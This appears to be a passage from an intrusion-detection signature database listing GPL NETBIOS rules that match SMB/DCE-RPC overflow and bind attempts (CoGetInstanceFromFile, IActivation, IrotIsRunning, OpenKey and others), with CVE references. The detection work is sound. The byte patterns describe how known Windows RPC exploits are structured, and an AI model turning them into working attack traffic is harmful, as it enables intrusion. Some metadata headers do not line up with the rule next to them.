Name : SMB-DS CoGetInstanceFromFile unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103440

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.isystemactivator.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|04 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103440; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103191

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS CoGetInstanceFromFile unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103191; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS CoGetInstanceFromFile unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103389

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103389; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103390

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103390; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103391

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103391; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103392

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IActivation unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B8|J|9F|M|1C|}|CF 11 86 1E 00| |AF|n|7C|W"; within:16; distance:29; flowbits:set,dce.iactivation.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103392; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IActivation unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103405

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103405; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103406

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103406; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103407

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103407; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103408

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS ISystemActivator unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103408; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS ISystemActivator unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103268

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103268; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103269

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103269; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103270

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103270; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103271

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS IrotIsRunning unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103271; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS IrotIsRunning unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103023

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103023; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103025

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103025; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103230

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103230; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103231

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103231; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103232

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103232; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103233

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS OpenKey unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; reference:url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx; classtype:attempted-admin; sid:2103233; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS OpenKey unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377|url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103421

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103421; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103422

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS RemoteActivation little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103422; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS RemoteActivation little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

